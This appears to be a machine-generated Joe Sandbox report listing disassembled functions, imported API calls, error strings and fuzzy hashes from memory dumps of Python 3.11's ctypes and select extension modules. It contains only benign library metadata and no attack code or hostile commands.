_wstring_at_addr, xrefs: 00007FF8B93C5692
ArgumentError, xrefs: 00007FF8B93C5785
RTLD_GLOBAL, xrefs: 00007FF8B93C5714
__version__, xrefs: 00007FF8B93C5534
RTLD_LOCAL, xrefs: 00007FF8B93C56D3
FUNCFLAG_USE_LASTERROR, xrefs: 00007FF8B93C54AA
_memmove_addr, xrefs: 00007FF8B93C557A
_pointer_type_cache, xrefs: 00007FF8B93C531A

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dealloc$Module_Object$From$Long_$Long$Void$StringUnicode_
String ID: 1.1.0$ArgumentError$COMError$CTYPES_MAX_ARGCOUNT$FUNCFLAG_CDECL$FUNCFLAG_HRESULT$FUNCFLAG_PYTHONAPI$FUNCFLAG_STDCALL$FUNCFLAG_USE_ERRNO$FUNCFLAG_USE_LASTERROR$RTLD_GLOBAL$RTLD_LOCAL$__version__$_cast_addr$_memmove_addr$_memset_addr$_pointer_type_cache$_string_at_addr$_wstring_at_addr
API String ID: 2895207140-772522829
Opcode ID: b7dbbcc8b36d8762ecc7955ef4353bb7629bcf7eedf864b22fa349bc15453bc1
Instruction ID: a0241bd020381653211fc59ecd479c91750306bb1f14e9d9d446e1275299dad3
Opcode Fuzzy Hash: b7dbbcc8b36d8762ecc7955ef4353bb7629bcf7eedf864b22fa349bc15453bc1
Instruction Fuzzy Hash: 29E1B924A0EBC681FE698F69D8742792368AF8FFD5B057535CF4E46695DF2CE0488301

Function 00007FF8B93C1B80 Relevance: 54.5, APIs: 17, Strings: 14, Instructions: 246COMMON

Download Yara Rule

APIs

_PyArg_ParseTuple_SizeT.PYTHON311 ref: 00007FF8B93C1BC1
PySequence_Tuple.PYTHON311 ref: 00007FF8B93C1BE4
_PyArg_ParseTuple_SizeT.PYTHON311 ref: 00007FF8B93C1C15
PySys_Audit.PYTHON311 ref: 00007FF8B93C1C4B
PyObject_GetAttrString.PYTHON311 ref: 00007FF8B93C1C64
PyLong_AsVoidPtr.PYTHON311 ref: 00007FF8B93C1C8D
PyErr_Occurred.PYTHON311 ref: 00007FF8B93C1CA0
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C1D7D
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C6D74
PyErr_SetString.PYTHON311 ref: 00007FF8B93C6DAA
PyErr_Format.PYTHON311 ref: 00007FF8B93C6DC3

Part of subcall function 00007FF8B93C1D8C: PyEval_SaveThread.PYTHON311 ref: 00007FF8B93C1DA1
Part of subcall function 00007FF8B93C1D8C: GetProcAddress.KERNEL32 ref: 00007FF8B93C1DB0
Part of subcall function 00007FF8B93C1D8C: PyEval_RestoreThread.PYTHON311 ref: 00007FF8B93C1DBC

PyErr_Format.PYTHON311 ref: 00007FF8B93C6DFC
PyErr_Format.PYTHON311 ref: 00007FF8B93C6E0F
_PyArg_ParseTuple_SizeT.PYTHON311 ref: 00007FF8B93C6E9A
PyErr_SetString.PYTHON311 ref: 00007FF8B93C6F4C
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C6F5C
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C6F6F

Strings

ctypes.dlsym, xrefs: 00007FF8B93C1C40
function ordinal %d not found, xrefs: 00007FF8B93C6E08
could not convert the _handle attribute to a pointer, xrefs: 00007FF8B93C6D80
paramflags must be a sequence of (int [,string [,value]]) tuples, xrefs: 00007FF8B93C6F1D
the _handle attribute of the second argument must be an integer, xrefs: 00007FF8B93C6F42
abstract class, xrefs: 00007FF8B93C6E28
O|O, xrefs: 00007FF8B93C1BA9
i|OO, xrefs: 00007FF8B93C6E8A
paramflags must have the same length as argtypes, xrefs: 00007FF8B93C6D89
paramflag value %d not supported, xrefs: 00007FF8B93C6DB9
function '%s' not found, xrefs: 00007FF8B93C6DF5
_handle, xrefs: 00007FF8B93C1C5D
O&O;illegal func_spec argument, xrefs: 00007FF8B93C1C0E
paramflags must be a tuple or None, xrefs: 00007FF8B93C6D99

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_$Dealloc$Arg_FormatParseSizeStringTuple_$Eval_Thread$AddressAttrAuditLong_Object_OccurredProcRestoreSaveSequence_Sys_TupleVoid
String ID: O&O;illegal func_spec argument$O|O$_handle$abstract class$could not convert the _handle attribute to a pointer$ctypes.dlsym$function '%s' not found$function ordinal %d not found$i|OO$paramflag value %d not supported$paramflags must be a sequence of (int [,string [,value]]) tuples$paramflags must be a tuple or None$paramflags must have the same length as argtypes$the _handle attribute of the second argument must be an integer
API String ID: 1081342661-1557499450
Opcode ID: 81bf86f915efca78798dbd81cfc19dde70ba7face78de59bde1888ce70c5e139
Instruction ID: 46875440f4922d8ed6842803672bdf09f0dbb59f7c2d7486e945eea6fac2cde8
Opcode Fuzzy Hash: 81bf86f915efca78798dbd81cfc19dde70ba7face78de59bde1888ce70c5e139
Instruction Fuzzy Hash: 43C10926A09F8695EB658F69D8941BA27B4FF49BC8F546036DB0E07768DF3CE449C300

Function 00007FF8B93CC9D0 Relevance: 54.5, APIs: 23, Strings: 8, Instructions: 244COMMON

Download Yara Rule

APIs

PyGILState_Ensure.PYTHON311 ref: 00007FF8B93CCA15
PyType_IsSubtype.PYTHON311 ref: 00007FF8B93CCAFE
memcpy.VCRUNTIME140 ref: 00007FF8B93CCB1E
_PyDict_ContainsId.PYTHON311 ref: 00007FF8B93CCB31
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B93CCBAC
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B93CCBB7
GetLastError.KERNEL32 ref: 00007FF8B93CCBC9
SetLastError.KERNEL32 ref: 00007FF8B93CCBD5
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CCBFA
PyErr_SetString.PYTHON311 ref: 00007FF8B93CCC1A
PyObject_Vectorcall.PYTHON311 ref: 00007FF8B93CCC3E
_PyErr_WriteUnraisableMsg.PYTHON311 ref: 00007FF8B93CCC56
GetLastError.KERNEL32 ref: 00007FF8B93CCC66
SetLastError.KERNEL32 ref: 00007FF8B93CCC72
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B93CCC81
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B93CCC8C
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CCCA3

Part of subcall function 00007FF8B93CCDA0: _Py_CheckFunctionResult.PYTHON311 ref: 00007FF8B93CCDEF

_Py_Dealloc.PYTHON311 ref: 00007FF8B93CCCFC
PyErr_WarnEx.PYTHON311 ref: 00007FF8B93CCD1B
_PyErr_WriteUnraisableMsg.PYTHON311 ref: 00007FF8B93CCD31
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CCD40
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CCD59
PyGILState_Release.PYTHON311 ref: 00007FF8B93CCD6E

Strings

on calling ctypes callback function, xrefs: 00007FF8B93CCC4F
memory leak in callback function., xrefs: 00007FF8B93CCD0B
on converting result of ctypes callback function, xrefs: 00007FF8B93CCD2A
cannot build parameter, xrefs: 00007FF8B93CCC10
create argument %zd:, xrefs: 00007FF8B93CCBDD
Parsing argument %zd, xrefs: 00007FF8B93CCC20
unexpected result of create argument %zd:, xrefs: 00007FF8B93CCC00
getting _needs_com_addref_, xrefs: 00007FF8B93CCB3D

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dealloc$Err_ErrorLast_errno$State_UnraisableWrite$CheckContainsDict_EnsureFunctionObject_ReleaseResultStringSubtypeType_VectorcallWarnmemcpy
String ID: Parsing argument %zd$cannot build parameter$create argument %zd:$getting _needs_com_addref_$memory leak in callback function.$on calling ctypes callback function$on converting result of ctypes callback function$unexpected result of create argument %zd:
API String ID: 1331253392-2697724128
Opcode ID: 662eda2fa9ad5fa4c0407cff36c88571a43e939dd8943eeb715751b67e50d2ce
Instruction ID: 0aceae93913d52669a29788e7f8ce90441857874e46f477239e60d3e6347c21e
Opcode Fuzzy Hash: 662eda2fa9ad5fa4c0407cff36c88571a43e939dd8943eeb715751b67e50d2ce
Instruction Fuzzy Hash: 69B13836A09F8686EB609F29D8541A927B4FF49BD8F48A931DB0D477A4DF3CE449C300

Function 00007FF8B93C3BF0 Relevance: 47.4, APIs: 19, Strings: 8, Instructions: 181threadCOMMON

Download Yara Rule

APIs

ffi_prep_cif.LIBFFI-8 ref: 00007FF8B93C3C54
ffi_call.LIBFFI-8 ref: 00007FF8B93C3CBF
PyErr_Occurred.PYTHON311 ref: 00007FF8B93C3D19
PyEval_SaveThread.PYTHON311 ref: 00007FF8B93C3D41
PyErr_SetString.PYTHON311 ref: 00007FF8B93C8734
PyErr_SetFromWindowsErr.PYTHON311 ref: 00007FF8B93C873F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B93C8772
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B93C8781

Strings

exception: access violation writing %p, xrefs: 00007FF8B93C88A2
exception: datatype misalignment, xrefs: 00007FF8B93C8867
No ffi_type for result, xrefs: 00007FF8B93C870A
ffi_prep_cif failed, xrefs: 00007FF8B93C8713
exception: breakpoint encountered, xrefs: 00007FF8B93C8723
ctypes.seh_exception, xrefs: 00007FF8B93C8818
exception: access violation reading %p, xrefs: 00007FF8B93C8890
exception: single step, xrefs: 00007FF8B93C885B

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_$_errno$Eval_FromOccurredSaveStringThreadWindowsffi_callffi_prep_cif
String ID: No ffi_type for result$ctypes.seh_exception$exception: access violation reading %p$exception: access violation writing %p$exception: breakpoint encountered$exception: datatype misalignment$exception: single step$ffi_prep_cif failed
API String ID: 1937973484-2749438402
Opcode ID: 430c0edaa122ef19808d40242a936452debd4f228559f93505334d9254383600
Instruction ID: 0c548978a48bfad698b8aa7f93f2447b41e021593b84329f6ccc351a51e54350
Opcode Fuzzy Hash: 430c0edaa122ef19808d40242a936452debd4f228559f93505334d9254383600
Instruction Fuzzy Hash: 90812976A0CBC696E6618F19E85427A67B9FF8DBC4F506035DB4E036A4DF3CE9488700

Function 00007FF8B93C41E0 Relevance: 45.7, APIs: 18, Strings: 8, Instructions: 214stringCOMMON

Download Yara Rule

APIs

_PyObject_LookupAttrId.PYTHON311 ref: 00007FF8B93C4230
PyUnicode_AsUTF8AndSize.PYTHON311 ref: 00007FF8B93C4268
strchr.VCRUNTIME140 ref: 00007FF8B93C4290
PyDict_Update.PYTHON311 ref: 00007FF8B93C4348
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C436B
PyObject_SetAttrString.PYTHON311 ref: 00007FF8B93C4425
PyObject_SetAttrString.PYTHON311 ref: 00007FF8B93C4438
PyObject_SetAttrString.PYTHON311 ref: 00007FF8B93C444B
PyObject_SetAttrString.PYTHON311 ref: 00007FF8B93C445E
PyErr_Occurred.PYTHON311 ref: 00007FF8B93C448C
PyErr_Format.PYTHON311 ref: 00007FF8B93C8DBE
PyErr_Format.PYTHON311 ref: 00007FF8B93C8DDD

Part of subcall function 00007FF8B93C22B0: _PyObject_MakeTpCall.PYTHON311 ref: 00007FF8B93C2301

Part of subcall function 00007FF8B93C455C: PyMem_Malloc.PYTHON311 ref: 00007FF8B93C4588

_Py_Dealloc.PYTHON311 ref: 00007FF8B93C8DEE
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C8E07
PyErr_SetString.PYTHON311 ref: 00007FF8B93C8E57
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C8E70
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C8E7F

Strings

class must define a '_type_' attribute, xrefs: 00007FF8B93C8D87
__ctype_le__, xrefs: 00007FF8B93C442E, 00007FF8B93C4441
__ctype_be__, xrefs: 00007FF8B93C4418, 00007FF8B93C4454
class must define a '_type_' attribute which must be a string of length 1, xrefs: 00007FF8B93C8D9A
_type_ '%s' not supported, xrefs: 00007FF8B93C8DD0
cbBhHiIlLdfuzZqQPXOv?g, xrefs: 00007FF8B93C4289, 00007FF8B93C8DAD
class must define a '_type_' string attribute, xrefs: 00007FF8B93C8E4D
class must define a '_type_' attribute which must bea single character string containing one of '%s'., xrefs: 00007FF8B93C8DB4

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Object_$AttrDeallocString$Err_$Format$CallDict_LookupMakeMallocMem_OccurredSizeUnicode_Updatestrchr
String ID: __ctype_be__$__ctype_le__$_type_ '%s' not supported$cbBhHiIlLdfuzZqQPXOv?g$class must define a '_type_' attribute$class must define a '_type_' attribute which must bea single character string containing one of '%s'.$class must define a '_type_' attribute which must be a string of length 1$class must define a '_type_' string attribute
API String ID: 692835343-917751260
Opcode ID: 1cbc2b4066554eb2cebf210fbf6479008959c66222fb09b3e1ad465d8608973f
Instruction ID: 49ba22209e2f93b3723aa8d9e7de806be2de04989f7531dce7ee685cfa4e9fda
Opcode Fuzzy Hash: 1cbc2b4066554eb2cebf210fbf6479008959c66222fb09b3e1ad465d8608973f
Instruction Fuzzy Hash: 9CA12D21A09FC691EA658F29E8642BA23B4EF8EFD4F446535DB4E46764DF3CE548C300

Function 00007FF8B93C46D4 Relevance: 44.0, APIs: 18, Strings: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_PyObject_LookupAttrId.PYTHON311 ref: 00007FF8B93C4715
_PyLong_Sign.PYTHON311 ref: 00007FF8B93C4744
PyLong_AsSsize_t.PYTHON311 ref: 00007FF8B93C4757
_PyObject_LookupAttrId.PYTHON311 ref: 00007FF8B93C4786

Part of subcall function 00007FF8B93C22B0: _PyObject_MakeTpCall.PYTHON311 ref: 00007FF8B93C2301

Part of subcall function 00007FF8B93C3A70: PyMem_Malloc.PYTHON311 ref: 00007FF8B93C3AB0

PyMem_Malloc.PYTHON311 ref: 00007FF8B93C4802
PyDict_Update.PYTHON311 ref: 00007FF8B93C48A9
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C48CC
PyErr_SetString.PYTHON311 ref: 00007FF8B93C8F34
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C8F45
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C8F61
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C8F77
PyErr_Occurred.PYTHON311 ref: 00007FF8B93C8F83
PyErr_ExceptionMatches.PYTHON311 ref: 00007FF8B93C8F9C
PyErr_SetString.PYTHON311 ref: 00007FF8B93C8FCC
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C8FDB
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C8FF0
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C9003
PyErr_NoMemory.PYTHON311 ref: 00007FF8B93C900F

Strings

class must define a '_type_' attribute, xrefs: 00007FF8B93C8F13
class must define a '_length_' attribute, xrefs: 00007FF8B93C8F0A
The '_length_' attribute must not be negative, xrefs: 00007FF8B93C8F6E
The '_length_' attribute is too large, xrefs: 00007FF8B93C8F2A
The '_length_' attribute must be an integer, xrefs: 00007FF8B93C8F52
array too large, xrefs: 00007FF8B93C8FC2
_type_ must have storage info, xrefs: 00007FF8B93C8FB2

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dealloc$Err_$Object_$AttrLong_LookupMallocMem_String$CallDict_ExceptionMakeMatchesMemoryOccurredSignSsize_tUpdate
String ID: The '_length_' attribute is too large$The '_length_' attribute must be an integer$The '_length_' attribute must not be negative$_type_ must have storage info$array too large$class must define a '_length_' attribute$class must define a '_type_' attribute
API String ID: 4019195241-504660705
Opcode ID: 055b8fc62c60c1bd71026e2f714f2505c56a84889395af57f89967a2e91b601f
Instruction ID: 9d35329ab1a95dc46135c93818769c9391690f47545421096618e59438a6116e
Opcode Fuzzy Hash: 055b8fc62c60c1bd71026e2f714f2505c56a84889395af57f89967a2e91b601f
Instruction Fuzzy Hash: 6FA10D31A09F8691EBA48F2DE8A427A23B5FF49BD4F546135DB1E462A4DF3CE549C300

Function 00007FF8B93CA4C0 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 215COMMON

Download Yara Rule

APIs

PyIndex_Check.PYTHON311 ref: 00007FF8B93CA4E1
PyNumber_AsSsize_t.PYTHON311 ref: 00007FF8B93CA4FA
PyErr_Occurred.PYTHON311 ref: 00007FF8B93CA509
PyNumber_AsSsize_t.PYTHON311 ref: 00007FF8B93CA570
PyErr_Occurred.PYTHON311 ref: 00007FF8B93CA57F
PyNumber_AsSsize_t.PYTHON311 ref: 00007FF8B93CA5B7
PyErr_Occurred.PYTHON311 ref: 00007FF8B93CA5C6
PyNumber_AsSsize_t.PYTHON311 ref: 00007FF8B93CA5F5
PyErr_Occurred.PYTHON311 ref: 00007FF8B93CA604
PyBytes_FromStringAndSize.PYTHON311 ref: 00007FF8B93CA688
PyMem_Malloc.PYTHON311 ref: 00007FF8B93CA6A5
PyErr_NoMemory.PYTHON311 ref: 00007FF8B93CA6B3
PyBytes_FromStringAndSize.PYTHON311 ref: 00007FF8B93CA6D9
PyMem_Free.PYTHON311 ref: 00007FF8B93CA6E5
PyUnicode_New.PYTHON311 ref: 00007FF8B93CA71D
PyUnicode_FromWideChar.PYTHON311 ref: 00007FF8B93CA735
PyList_New.PYTHON311 ref: 00007FF8B93CA797
PyErr_SetString.PYTHON311 ref: 00007FF8B93CA7DE

Strings

slice start is required for step < 0, xrefs: 00007FF8B93CA55D
Pointer indices must be integer, xrefs: 00007FF8B93CA7D4
slice step cannot be zero, xrefs: 00007FF8B93CA595
slice stop is required, xrefs: 00007FF8B93CA5E2

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_$Number_OccurredSsize_t$FromString$Bytes_Mem_SizeUnicode_$CharCheckFreeIndex_List_MallocMemoryWide
String ID: Pointer indices must be integer$slice start is required for step < 0$slice step cannot be zero$slice stop is required
API String ID: 3053630023-3059441807
Opcode ID: 6979928dfef85d8a828cd9ee037a140b3c1fa3fa22f5c964d232601827984960
Instruction ID: ab8707b7f21bdd7a062018c9d1666010ac69fb03fe42b28e819cf7e731c73db9
Opcode Fuzzy Hash: 6979928dfef85d8a828cd9ee037a140b3c1fa3fa22f5c964d232601827984960
Instruction Fuzzy Hash: 04916D21A09F8686EA609F1DE55407923B5FF49FE0F466631DB2E877E4DF2CE4598300

Function 00007FF8B93CC6B4 Relevance: 42.1, APIs: 21, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

PyUnicode_InternFromString.PYTHON311 ref: 00007FF8B93CC6E7
PyImport_ImportModule.PYTHON311 ref: 00007FF8B93CC6FB
PyObject_GetAttrString.PYTHON311 ref: 00007FF8B93CC717
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CC729
PyLong_FromVoidPtr.PYTHON311 ref: 00007FF8B93CC73B
PyLong_FromVoidPtr.PYTHON311 ref: 00007FF8B93CC747
PyLong_FromVoidPtr.PYTHON311 ref: 00007FF8B93CC753
PyObject_CallFunctionObjArgs.PYTHON311 ref: 00007FF8B93CC789
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CC79C
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CC7AB
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CC7BA
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CC7C9
PyLong_AsLong.PYTHON311 ref: 00007FF8B93CC7DB
PyErr_Occurred.PYTHON311 ref: 00007FF8B93CC7E3
PyErr_WriteUnraisable.PYTHON311 ref: 00007FF8B93CC803
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CC817
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CC82B
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CC83F
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CC853
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CC862
PyErr_WriteUnraisable.PYTHON311 ref: 00007FF8B93CC87D

Strings

DllGetClassObject, xrefs: 00007FF8B93CC70D
_ctypes.DllGetClassObject, xrefs: 00007FF8B93CC6E0
ctypes, xrefs: 00007FF8B93CC6F4

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dealloc$FromLong_$Err_Void$Object_StringUnraisableWrite$ArgsAttrCallFunctionImportImport_InternLongModuleOccurredUnicode_
String ID: DllGetClassObject$_ctypes.DllGetClassObject$ctypes
API String ID: 375360433-177550262
Opcode ID: b5513430baef804698b72f87c032f2232b88aa434da5969d4ce7dec095e12011
Instruction ID: 8c12b4bf4818c066dd222f47b67f7259e628269af88a94fd6c2c40c9cd0552ca
Opcode Fuzzy Hash: b5513430baef804698b72f87c032f2232b88aa434da5969d4ce7dec095e12011
Instruction Fuzzy Hash: 2451DF35E09B8685FA649F29A96423A63B4FF8EFD1F4C6534CB4E16760DF3CA8458300

Function 00007FF8B9062260 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 202timethreadnetworkCOMMON

Download Yara Rule

APIs

_PyTime_FromSecondsObject.PYTHON311(?,?,?,00007FF8A8966CC8,?,?,00007FF8B906224F), ref: 00007FF8B90622BF
PyErr_ExceptionMatches.PYTHON311(?,?,?,00007FF8A8966CC8,?,?,00007FF8B906224F), ref: 00007FF8B90622D3
PyErr_SetString.PYTHON311(?,?,?,00007FF8A8966CC8,?,?,00007FF8B906224F), ref: 00007FF8B906231F

Part of subcall function 00007FF8B90625C8: PySequence_Fast.PYTHON311(00007FF8A8966CC8,?,?,00007FF8B906224F), ref: 00007FF8B90625F0

_PyDeadline_Init.PYTHON311(?,?,?,00007FF8A8966CC8,?,?,00007FF8B906224F), ref: 00007FF8B90623DA
PyEval_SaveThread.PYTHON311(?,?,?,00007FF8A8966CC8,?,?,00007FF8B906224F), ref: 00007FF8B906241A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF8A8966CC8,?,?,00007FF8B906224F), ref: 00007FF8B9062423
select.WS2_32 ref: 00007FF8B906243D
PyEval_RestoreThread.PYTHON311(?,?,?,00007FF8A8966CC8,?,?,00007FF8B906224F), ref: 00007FF8B9062449
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF8A8966CC8,?,?,00007FF8B906224F), ref: 00007FF8B906244F
PyErr_CheckSignals.PYTHON311(?,?,?,00007FF8A8966CC8,?,?,00007FF8B906224F), ref: 00007FF8B906245E
_PyDeadline_Get.PYTHON311(?,?,?,00007FF8A8966CC8,?,?,00007FF8B906224F), ref: 00007FF8B9062479
_PyTime_AsTimeval_clamp.PYTHON311(?,?,?,00007FF8A8966CC8,?,?,00007FF8B906224F), ref: 00007FF8B9062497
PyErr_Occurred.PYTHON311(?,?,?,00007FF8A8966CC8,?,?,00007FF8B906224F), ref: 00007FF8B90624F2
PyTuple_Pack.PYTHON311(?,?,?,00007FF8A8966CC8,?,?,00007FF8B906224F), ref: 00007FF8B9062509
_Py_Dealloc.PYTHON311(?,?,?,00007FF8A8966CC8,?,?,00007FF8B906224F), ref: 00007FF8B9062520
_Py_Dealloc.PYTHON311(?,?,?,00007FF8A8966CC8,?,?,00007FF8B906224F), ref: 00007FF8B9062534
_Py_Dealloc.PYTHON311(?,?,?,00007FF8A8966CC8,?,?,00007FF8B906224F), ref: 00007FF8B9062548
WSAGetLastError.WS2_32(?,?,?,00007FF8A8966CC8,?,?,00007FF8B906224F), ref: 00007FF8B90625AE
PyErr_SetExcFromWindowsErr.PYTHON311(?,?,?,00007FF8A8966CC8,?,?,00007FF8B906224F), ref: 00007FF8B90625C0

Part of subcall function 00007FF8B90625C8: PyObject_AsFileDescriptor.PYTHON311(?,?,00007FF8B906224F), ref: 00007FF8B906265C
Part of subcall function 00007FF8B90625C8: PyErr_SetString.PYTHON311(?,?,00007FF8B906224F), ref: 00007FF8B90626CA
Part of subcall function 00007FF8B90625C8: _Py_Dealloc.PYTHON311(?,?,00007FF8B906224F), ref: 00007FF8B90626D9
Part of subcall function 00007FF8B90625C8: _Py_Dealloc.PYTHON311(?,?,00007FF8B906224F), ref: 00007FF8B90626E8

Part of subcall function 00007FF8B90625C8: _Py_Dealloc.PYTHON311(?,?,00007FF8B906224F), ref: 00007FF8B90626FE

Strings

timeout must be non-negative, xrefs: 00007FF8B9062315
timeout must be a float or None, xrefs: 00007FF8B90622E4

Memory Dump Source

Source File: 00000007.00000002.2087887642.00007FF8B9061000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8B9060000, based on PE: true

Associated: 00000007.00000002.2087851325.00007FF8B9060000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000007.00000002.2087957246.00007FF8B9063000.00000002.00000001.01000000.00000012.sdmpDownload File
